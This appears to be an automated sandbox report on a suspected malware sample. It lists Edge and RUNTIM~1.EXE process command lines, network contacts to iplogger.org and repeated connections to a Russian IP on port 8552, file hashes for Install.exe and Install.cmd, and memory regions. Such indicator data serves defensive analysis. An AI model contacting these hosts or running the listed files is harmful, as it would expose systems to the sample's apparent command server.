"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ff8097d46f8,0x7ff8097d4708,0x7ff8097d4718

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,13914911482353512326,12013583068061945930,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4860 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 56.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 104.21.4.208:443 iplogger.org tcp
US 104.21.4.208:443 iplogger.org tcp
US 8.8.8.8:53 208.4.21.104.in-addr.arpa udp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
US 8.8.8.8:53 205.179.17.96.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
US 8.8.8.8:53 8.179.89.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe

MD5 3973c47bf5f334ea720a9d603d2c6510
SHA1 bf2b72dc12d4d41e08b452e465c40d010b2aba4e
SHA256 4e9a1202844e30f1d62d837cdb440764c851740ab8ee2bd4a8a31475bd449eea
SHA512 cafc322ba71bafad2b15b82553a2a0749d0b6cb8349fe7fd24de25f7dca48c5aa0c9e7d170571c87a55381ec21d33045d7ba9a17891aabee187358da9b406861

C:\Users\Admin\AppData\Local\Temp\7zS8B19.tmp\Install.cmd

MD5 21661026606353f423078c883708787d
SHA1 338e288b851e0e5bee26f887e50bfcd8150e8257
SHA256 6a77796213adbc0eb764c070a3fdfcb5bfa3ad9b6215c1be43f09bfd32014782
SHA512 61760ab64e2c38d9bd5102ab0106e451a5c91e1598906f92e1285b7ae1ca1c6e02480d4157d0f350d2dc816088b5b0838a5d7c7b9d80444ecbf9d62b9ca5b65b

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

MD5 0c6ef320b361f01d63147dec80c3f34c
SHA1 c04adc3da100118f72e41c1c4645cbf8fa813cee
SHA256 bf89a45619528967430c483c01da54306e4f1b200a8c062697218fdd60bac93f
SHA512 f204ea35dffab3bd703ccf3a52e8ce26be5cde8f24b485b8a0c34a7dc9948bfcae3c7d2d268d5e4fd736dd55245ee995a4bfe0726e2b7fbb379095c69e9ddb69

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0764f5481d3c05f5d391a36463484b49
SHA1 2c96194f04e768ac9d7134bc242808e4d8aeb149
SHA256 cc773d1928f4a87e10944d153c23a7b20222b6795c9a0a09b81a94c1bd026ac3
SHA512 a39e4cb7064fdd7393ffe7bb3a5e672b1bdc14d878cac1c5c9ceb97787454c5a4e7f9ae0020c6d524920caf7eadc9d49e10bee8799d73ee4e8febe7e51e22224

memory/1896-22-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/1896-21-0x00000000006D0000-0x00000000007DA000-memory.dmp

memory/1896-23-0x0000000005190000-0x000000000522C000-memory.dmp

\??\pipe\LOCAL\crashpad_4868_NJNRXHPXUGPVIKLY

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1896-30-0x00000000057E0000-0x0000000005D84000-memory.dmp

memory/1896-34-0x00000000052D0000-0x0000000005362000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e494d16e4b331d7fc483b3ae3b2e0973
SHA1 d13ca61b6404902b716f7b02f0070dec7f36edbf
SHA256 a43f82254638f7e05d1fea29e83545642f163a7a852f567fb2e94f0634347165
SHA512 016b0ed886b33d010c84ca080d74fa343da110db696655c94b71a4cb8eb8284748dd83e06d0891a6e1e859832b0f1d07748b11d4d1a4576bbe1bee359e218737

memory/1896-37-0x00000000054E0000-0x00000000054F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c77ada37f300e9e0bc7b557806b2ef5d
SHA1 3cd6a11ff66ed37c4b207c81501d3907a3830196
SHA256 21895e84805e119ae30444b54efe32814131f454f9c90959ce297776702e013c
SHA512 313988591d81a5978e6b9de91606742f2ea2441de11c778a5614fac25ba2d62425bdd5e1f52ce57d330ea67f4dd2894a27b272addef36ba74d92e7bf480b0433

memory/1896-43-0x0000000005270000-0x000000000527A000-memory.dmp

memory/1896-44-0x00000000054F0000-0x0000000005546000-memory.dmp

memory/1896-53-0x0000000007F80000-0x0000000007F98000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 bfaafc0a42b548c1a6a2d041c4cfad41
SHA1 fa362364c5e3eadd548896fa3bd3deb7f1ec9360
SHA256 9713fb1b3ea3f22e9ac286ac2b6fb96a9cca220c7c5716988b23c3c30d5e853d
SHA512 6f8b6c270cf7cd2e7e79dc47b5030f728c985c1f8921716974ae1095711c5fb2c8b3e17f27ef69ae8d8c4bd6f7c4665b29db9dc8ac8f20c36cd641afa20e258d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 75ec7bb1037d055e9daf328e57970ee5
SHA1 2cc8e7e3f7b5bc74bd0e49e76c596b569b68d7e9
SHA256 6c2cda7c08a903feac87572abc1575612b71a2e63ee87ed2140e97e17883c3f5
SHA512 0f10533f8cc6931c66f5e342a3a25899a5abd9d855eb994a90cecb38dd317812e723df1e51da0862172d23a6030afb5fe9a51c59a3372c04311cefe098c2e85f

memory/1896-82-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/1896-83-0x00000000054E0000-0x00000000054F0000-memory.dmp

memory/1896-93-0x00000000080F0000-0x000000000817A000-memory.dmp

memory/1896-94-0x000000000A830000-0x000000000A84E000-memory.dmp

memory/4384-95-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RUNTIM~1.EXE.log

MD5 17573558c4e714f606f997e5157afaac
SHA1 13e16e9415ceef429aaf124139671ebeca09ed23
SHA256 c18db6aecad2436da4a63ff26af4e3a337cca48f01c21b8db494fe5ccc60e553
SHA512 f4edf13f05a0d142e4dd42802098c8c44988ee8869621a62c2b565a77c9a95857f636583ff8d6d9baa366603d98b9bfbf1fc75bc6f9f8f83c80cb1215b2941cc

memory/1896-99-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/4384-100-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/4384-101-0x0000000005550000-0x0000000005B68000-memory.dmp

memory/4384-102-0x0000000004F30000-0x0000000004F42000-memory.dmp

memory/4384-103-0x0000000004FD0000-0x000000000500C000-memory.dmp

memory/4384-104-0x00000000051C0000-0x00000000051D0000-memory.dmp

memory/4384-105-0x0000000005010000-0x000000000505C000-memory.dmp

memory/4384-106-0x00000000052E0000-0x00000000053EA000-memory.dmp

memory/4384-120-0x0000000074FF0000-0x00000000757A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 4bc8a3540a546cfe044e0ed1a0a22a95
SHA1 5387f78f1816dee5393bfca1fffe49cede5f59c1
SHA256 f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca
SHA512 e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf